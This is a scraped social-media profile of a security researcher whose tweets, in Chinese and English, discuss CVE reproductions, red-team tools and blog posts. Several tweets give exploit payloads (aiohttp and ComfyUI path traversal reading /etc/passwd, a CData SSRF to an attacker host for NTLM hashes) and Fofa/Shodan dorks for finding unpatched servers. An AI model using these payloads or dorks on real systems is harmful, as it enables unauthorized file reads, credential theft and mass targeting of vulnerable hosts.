W01fh4cker Profile Banner
W01fh4cker Profile
W01fh4cker

@W01fh4cker

Followers
2,077
Following
1,140
Media
41
Statuses
334

Coder | Poet | Idealist

Joined January 2022
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
@W01fh4cker
W01fh4cker
6 months
又是一篇费劲心血的文章,32000字,配图206张,看完可以完全零基础从0到1掌握Java内存马,由于公众号发文字数限制,因此分几次发出,完整的请见我的博客,会持续更新;师傅们若在阅读过程中发现问题,可以直接私聊我,会在下次文章的开头作感谢。博客文章地址:
15
134
446
@W01fh4cker
W01fh4cker
5 months
CVE-2024-23334 Poc for windows: /static/../D:\flag.txt Poc for Linux: /static/../../../../etc/passwd [need to fuzz "../"] #aiohttp #vulnerability
Tweet media one
Tweet media two
8
97
316
@W01fh4cker
W01fh4cker
2 months
CVE-2024-21683 Confluence Authenticated RCE Exp: #CVE -2024-21683 #confluence #rce #redteam
Tweet media one
0
68
229
@W01fh4cker
W01fh4cker
6 months
添加了目录,方便师傅们快捷查看。
Tweet media one
3
49
207
@W01fh4cker
W01fh4cker
5 months
Fofa Dork: title="ComfyUI" && header!="aiohttp/3.9.3" && header!="aiohttp/3.9.2" PAYLOAD: /extensions/../../../../../../../../../etc/passwd🙆
Tweet media one
@GobySec
Goby(Metasec)
5 months
📢📢 #CVE -2024-23334 The vulnerability allows an attacker to read leaked source code, database configuration files, etc., resulting in a highly insecure web site. #cybersecurity #vulnerability #infosecurity learn more:
0
5
11
2
47
190
@W01fh4cker
W01fh4cker
5 months
Happy PWN!!! RCE script: #CVE -2024-27198 #redteam #jetbrains #teamcity
Tweet media one
0
36
124
@W01fh4cker
W01fh4cker
3 months
Tweet media one
0
25
116
@W01fh4cker
W01fh4cker
5 months
Perfect TeamcityRCE!!! New Script: #Teamcity #RCE #Jetbrains #CVE -2024-27198
Tweet media one
0
33
101
@W01fh4cker
W01fh4cker
1 year
🤔
Tweet media one
12
8
88
@W01fh4cker
W01fh4cker
5 months
Happy PWN!!!
Tweet media one
3
19
72
@W01fh4cker
W01fh4cker
4 months
用go语言实现通过dcerpc和ntlmssp获取Windows远程主机信息,代码翻译自Z20攻防的komomon师傅写的脚本。 源脚本地址(Python实现): 本脚本地址(Golang实现):
Tweet media one
Tweet media two
2
13
55
@W01fh4cker
W01fh4cker
5 months
Update: from ScreenConnect Auth Bypass to RCE! #ScreenConnect #ConnectWise #0day #redteam
Tweet media one
2
18
42
@W01fh4cker
W01fh4cker
1 year
CData Arc/API/Sync <= v22.0.8336 SSRF You can get the NTLM hash. Fofa Dork: - icon_hash="163538942" Shodan Dork: - http.favicon.hash:163538942 POC: - /%255c%255c[ATTACKER IP]%255cC$%255cbb Reference: #CVE -2023-24243 #nday #CData
Tweet media one
Tweet media two
0
13
39
@W01fh4cker
W01fh4cker
1 year
CVE-2023-36899的完整复现文章,国内都没看到有人发这个东西,除了dotnet知识星球
0
4
38
@W01fh4cker
W01fh4cker
1 year
自己写的一个用于在Linux x86_64上面安装并切换多个java版本的脚本,适用于代码审计工作者。因为装环境太累了,还是自动化舒服。
7
11
38
@W01fh4cker
W01fh4cker
2 months
The impact of the vulnerability is limited at present, but thanks to @chudyPB for providing a clever bypass idea. Simple Poc: #redteam #sharepoint #cve #BugBountyHunter
Tweet media one
1
13
38
@W01fh4cker
W01fh4cker
5 months
Solved the problem that the endpoint 404 of /app/rest/debug/processes in 2023.11.3 and other versions caused the RCE to fail. I will update the script to Github later. Please pay attention: #teamcity #rce #jetbrain #cve -2024-27198
Tweet media one
0
7
34
@W01fh4cker
W01fh4cker
2 months
Has anyone successfully reproduced Microsoft Sharepoint XXE (CVE-2024-30043)? I'm stuck here. "file:///localhost\c$/sites/cvetest/poc.xml" doesn't seem to help me get the unrestricted policy. Why is that? Can you give me some advice?
Tweet media one
Tweet media two
Tweet media three
0
9
30
@W01fh4cker
W01fh4cker
9 months
Tweet media one
3
8
28
@W01fh4cker
W01fh4cker
2 months
Premise: - a low-privilege user - have permission to execute scripts Exp: #redteam #bugbounty #bugbountytips #zabbix
Tweet media one
0
9
29
@W01fh4cker
W01fh4cker
1 year
Fofa Dork: app="Progress-MOVEit" Shodan Dork: title:"BridgeFi" Quake Dork: title:"BridgeFi" ZoomEye Dork: title:"BridgeFi" #CVE -2023-34362 #0day #1day #nday #MOVEit #Fofa #Shodan #Quake #ZoomEye
Tweet media one
Tweet media two
Tweet media three
Tweet media four
2
4
28
@W01fh4cker
W01fh4cker
2 months
FOFA: title="Check Point SSL Network Extender"
@johnk3r
Padawan
2 months
Observed several LATAM banks (CL,AR,CO,BR) vulnerable to this!!! Also, IT providers! #csirt #ir #checkpoint CVE-2024-24919 @1ZRR4H
Tweet media one
5
64
253
1
9
23
@W01fh4cker
W01fh4cker
1 year
下午的时候在yakit群里发现有人(利刃信安的号主)说是发现了个若依的0day,我点开图片看看感觉还煞有其事,但是感觉这种洞在的话应该早就被发现了。 于是我在github直接开搜关键词getImage和imageUrl,结果符合的就这一个仓库,并且是这个人使用了若依组组件并写了个接口方便测试。 (1/n)
Tweet media one
Tweet media two
Tweet media three
Tweet media four
3
1
14
@W01fh4cker
W01fh4cker
5 months
ScreenConnect RCE
Tweet media one
2
2
15
@W01fh4cker
W01fh4cker
1 year
Fofa Dork: - icon_hash="-244067125" Shodan Dork: - http.html:"SolarView Compact" - http.favicon.hash:-244067125 POC: - - #nday #fofa #shodan #Solarview #Compact #CVE -2023-23333
Tweet media one
Tweet media two
0
6
14
@W01fh4cker
W01fh4cker
2 months
2000fo commemoration
Tweet media one
2
1
12
@W01fh4cker
W01fh4cker
11 months
Thanks to Master Outmansec for the PR! Now VcenterKit supports macOS. ✨ Project link:
Tweet media one
Tweet media two
1
1
10
@W01fh4cker
W01fh4cker
2 months
I'm going crazy... CVE-2024-30043 SharePoint XXE
0
1
8
@W01fh4cker
W01fh4cker
2 months
The dust has settled, and the reason why CVE-2024-30043 failed to reproduce has been found. Windows Server has not been updated:
Tweet media one
Tweet media two
0
0
7
@W01fh4cker
W01fh4cker
6 months
6
Tweet media one
Tweet media two
1
0
8
@W01fh4cker
W01fh4cker
1 year
自学能力、创新能力至关重要😂
Tweet media one
0
0
8
@W01fh4cker
W01fh4cker
1 year
@momika233 Fofa: - app="Chamilo" - header="x-powered-by: Chamilo" Shodan: - http.component:"Chamilo" - x-powered-by: Chamilo
1
2
8
@W01fh4cker
W01fh4cker
10 months
@suanve 像我多好,没有兴趣或者时间我就直接不更新,最长的一次隔了快半年,然后整了篇2万字的😂
4
0
6
@W01fh4cker
W01fh4cker
2 months
@Skyworship2 那包是这样的,我在Microsoft Sharepoint xxe新洞上面研究了三天,每天投入很长时间,最后写一个文章,那是绝对比不上人家往公众号上面发poc发什么hw蓝队文章来的阅读量高,因为研究调试分析这种大型框架很痛苦,但是只有这种痛苦的过程才能帮助人提升。
1
0
6
@W01fh4cker
W01fh4cker
4 months
事情过去两天,还是想忍不住说,风气既如此,还是不去惹的一声腥比较好。投机倒把者太多,不过很快我所有号都会注销了,干活去了,眼不见心即不累。
6
1
6
@W01fh4cker
W01fh4cker
5 months
@koantinometa yakit🥳
2
0
6
@W01fh4cker
W01fh4cker
11 months
Surprised~🥳
Tweet media one
Tweet media two
Tweet media three
2
0
6
@W01fh4cker
W01fh4cker
1 year
这速度,比之前交的都要快哈哈哈哈
Tweet media one
2
0
5
@W01fh4cker
W01fh4cker
11 months
VcenterKit 0.0.2 Update Project url: Thank you for your star or fork. #Vcenter #redteam #CVE #nday #tool #pyqt5 #python
Tweet media one
Tweet media two
Tweet media three
Tweet media four
0
3
5
@W01fh4cker
W01fh4cker
6 months
给我的公众号引个流。 努力写好每一篇文章!
Tweet media one
Tweet media two
0
0
5
@W01fh4cker
W01fh4cker
4 months
踏入社会这么长时间还是有当年学生时代的热心肠,做人还是当冷漠点好。
0
0
5
@W01fh4cker
W01fh4cker
7 months
Life is a little bad, I'm a little tired😥
2
0
2
@W01fh4cker
W01fh4cker
6 months
@muWpPzThmh12LLw 会的,这就是我为什么还没写完就发了,typro底下显示25,000多字,然后每次打开会有一点卡顿,我之前用雨靴写差不多2万字不到就开始卡了,而且语雀卡顿情况非常严重,毕竟是electron应用
1
0
3
@W01fh4cker
W01fh4cker
5 months
@ybspro_official 之前一个站朋友发出来让帮忙看看,我当时在外面,我五分钟后回到家的时候已经被秒了,一问,0day打穿了
0
0
3
@W01fh4cker
W01fh4cker
8 months
@Skyworship2 @ProbiusOfficial 我指的是关于nuclei的一些有趣的细节哈哈哈
0
0
3
@W01fh4cker
W01fh4cker
6 months
Stop phishing me hhaha!
Tweet media one
0
0
3
@W01fh4cker
W01fh4cker
9 months
will publish
Tweet media one
@_JohnHammond
John Hammond
9 months
We've recreated a proof-of-concept for the SysAid CVE-2023-47246 remote code execution and compromise -- blog post coming ASAP😜 Big thanks to @gleeda @HuskyHacksMK @DaveKleinatland @calebjstewart and the whole @HuntressLabs crew helping dig into this one!
Tweet media one
7
86
407
0
1
3
@W01fh4cker
W01fh4cker
6 months
@UCIOWNSI 黑眼圈重了不少,今天睡个好觉
0
0
2
@W01fh4cker
W01fh4cker
1 year
@ybspro_official 典中典之傻逼掌控者😂
0
0
3
@W01fh4cker
W01fh4cker
1 year
@AabyssZG 哈哈哈和我之前有一次很像,打个攻防结果站点给关了,给我看笑了
0
0
3
@W01fh4cker
W01fh4cker
6 months
@Master_HanChan nuclei v3可以加入自定义代码逻辑
1
0
3
@W01fh4cker
W01fh4cker
8 months
🥹🥹
@AabyssZG
曾哥
8 months
非常感谢各位师傅的关注和支持🥰最近关注者数量突破5K啦~ 如果对网络安全感兴趣,可以关注以下列表: 列表收录要符合四个条件:1、推主是国人 2、在网络安全行业 3、能长期更新推文 4、不涉及敏感内容 有想要收录的师傅可以私信我,欢迎交流哈哈😄 #CyberSecurity #hackers
8
21
61
0
0
2
@W01fh4cker
W01fh4cker
2 years
@kamnayam @eI77kRZHwP7UhqA @1HUeDSni7XsgZvV 不用理那些人😂😂不过是一些乐色罢了
0
0
1
@W01fh4cker
W01fh4cker
8 months
@SEEMsec 我们pings怎么你了()
1
0
2
@W01fh4cker
W01fh4cker
2 months
@chudyPB @dustin_childs May I know the specific version you used to reproduce the vulnerability? I have never been able to reproduce it successfully under 16.0.0.10337. Thank you very much!
1
0
1
@W01fh4cker
W01fh4cker
6 months
@SEEMsec 我也不知道是哪608个冤种在关注,我自己公众号才499个朋友关注😭
Tweet media one
Tweet media two
Tweet media three
1
0
2
@W01fh4cker
W01fh4cker
2 years
@GcooQi @boiledwater 不用理他们😂😂
0
0
1
@W01fh4cker
W01fh4cker
2 years
@80vul I test IT,4/9000
0
0
2
@W01fh4cker
W01fh4cker
8 months
@AabyssZG tango😍
0
0
1
@W01fh4cker
W01fh4cker
9 months
@Skyworship2 @sirifu4k1 I just learned that nuclei v3 already supports inserting additional python code in yaml files🥰, which is really exciting and surprising. I was still stuck in v2 before, haha
0
0
2
@W01fh4cker
W01fh4cker
8 months
@joel_land Thank you very much for your valuable hands-on experience, I will continue testing to see what went wrong.
1
0
2
@W01fh4cker
W01fh4cker
6 months
@AabyssZG 看着文字逐渐增多,有一种成就感哈哈
0
0
1
@W01fh4cker
W01fh4cker
8 months
@Skyworship2 @ProbiusOfficial 没事,到时候有什么疑惑的就来问你🥰
1
0
2
@W01fh4cker
W01fh4cker
6 months
@clairexiaotong @SEEMsec 理解原理,举一反三,用已知解未知。各个知识点组成的图谱能在你脑海里面快速呈现,指哪讲哪,对每个漏洞的利用手法有了解,能够把所学用于实战,不用工具照样可以熟练地利用,算入门。比如mysql/mssql/oracle的sql注入的语句,随手就能敲出来(当然这仅仅是个小例子)。
1
0
2
@W01fh4cker
W01fh4cker
2 months
@chudyPB @dustin_childs The dust has settled, and the reason why the reproduction of CVE-2024-30043 failed has been found. I did not update Windows Server. Thank you very much for your selfless and accurate help!
0
1
2
@W01fh4cker
W01fh4cker
1 year
@AabyssZG 典中典之刚注册的号发poc
1
0
2
@W01fh4cker
W01fh4cker
5 months
@Tagashy69 In addition, I saw this vulnerability before on DUCTF2023: , so if the question was published before the vulnerability was submitted to cve, I think this It really can’t be called a new vulnerability
1
0
2
@W01fh4cker
W01fh4cker
1 year
@fack02011928 正确的;接触新事物新技术是我毕生的追求,尽管一些技术并不能立马变现。新技术才会让我时而感到兴奋。
0
0
2
@W01fh4cker
W01fh4cker
2 years
@Manjusaka_Lee 想问下这个资助透明吗?
1
0
2
@W01fh4cker
W01fh4cker
4 months
@ckcsec 不要说我冤枉人
Tweet media one
0
0
2
@W01fh4cker
W01fh4cker
1 year
从B站上看到的,byd转载投自制,翻了下原视频: 《Attack and Defend: Leveraging AWS Serverless Technology for End-to-End C2》,主讲人是Michael Long,AWS 的网络安全工程师;曾在美国陆军网络保护旅、陆军网络司令部和 MITRE 等组织工作。
0
0
2
@W01fh4cker
W01fh4cker
1 year
@ProbiusOfficial 非常不喜欢wsl,平常要么笔记本上面开虚拟机用要么台式机开给笔记本用
0
0
2
@W01fh4cker
W01fh4cker
1 year
@SecurityNewsbot So obvious, I've seen no less than ten of them🤣
0
0
0
@W01fh4cker
W01fh4cker
1 year
@ybspro_official 确实,对最新的安全威胁信息了如指掌
0
0
2
@W01fh4cker
W01fh4cker
4 months
@fack02011928 @ProbiusOfficial @AabyssZG 不想和这些沆瀣一气的人浪费时间
0
0
2
@W01fh4cker
W01fh4cker
1 year
直接本地搭建,发现确实应该就是这个仓库的,然后他应该是给代码改了下,支持file协议了,或者开了ftp。白激动一场哈哈哈 (1/2)
0
0
2
@W01fh4cker
W01fh4cker
8 months
@sheep1028_0818 @SEEMsec sqlmap汉化版是pings师傅弄的
1
0
2
@W01fh4cker
W01fh4cker
7 months
@www30919942 肚子里没货还传播垃圾,纯纯垃圾公众号
0
0
2
@W01fh4cker
W01fh4cker
4 months
@ProbiusOfficial @AabyssZG 准确来说是我朋友的同事,这个朋友跟我关系很好,我就忍不住说了。
3
0
2
@W01fh4cker
W01fh4cker
1 year
@ybspro_official apt也有高低之分的哇,ddos那也算的😃打进锅芳布那也叫apt,钓鱼打菌工也叫apt😂😂
0
0
1
@W01fh4cker
W01fh4cker
2 years
@biantaisjh @ivenvd 你讲的实在是太好了
0
0
0
@W01fh4cker
W01fh4cker
1 year
@cijianzy 支持!爱来自CW。
0
0
1
@W01fh4cker
W01fh4cker
1 year
@k1nge3 哈哈哈哈
0
0
1
@W01fh4cker
W01fh4cker
10 months
@suanve @Skyworship2 我也好久没同步博客了,工作太累了,你这一说倒是提醒我了,这周末同步下😭
0
0
1
@W01fh4cker
W01fh4cker
2 years
@ManasH4rsh Congratulations!😘
0
0
1
@W01fh4cker
W01fh4cker
10 months
@Randark_JMT 哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈是这样的
0
0
0